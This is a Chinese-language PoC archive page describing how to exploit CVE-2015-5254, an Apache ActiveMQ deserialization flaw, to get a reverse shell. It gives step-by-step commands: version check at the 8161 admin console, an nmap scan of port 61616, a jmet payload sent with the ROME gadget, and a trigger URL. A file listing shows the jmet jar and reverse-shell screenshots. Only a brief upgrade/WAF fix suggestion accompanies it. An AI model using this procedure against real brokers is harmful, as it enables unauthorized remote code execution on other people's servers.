关联漏洞
描述
ActiveMQ_CVE-2015-5254
介绍
ActiveMQ反序列化(CVE-2015-5254)
漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
影响版本:Apache ActiveMQ 5.13.0之前的5.x版本
0x01 登陆后台确定版本:
http://IP:8161

0x02 确定61616端口开放:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 发送反弹payload:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 点击触发Browse event-Message ID ,成功反弹:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

修复建议:升级到最新版本,配置waf相关规则进行拦截
文件快照
[4.0K] /data/pocs/8c90ab8b85e16fbd9404edaef2bd91a38054035b
├── [4.0K] images
│ ├── [ 65K] 61616.jpg
│ ├── [ 79K] version.jpg
│ ├── [634K] 反弹shell.jpg
│ └── [205K] 成功反弹.jpg
├── [ 55M] jmet-0.1.0-all.jar
└── [1.2K] README.md
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。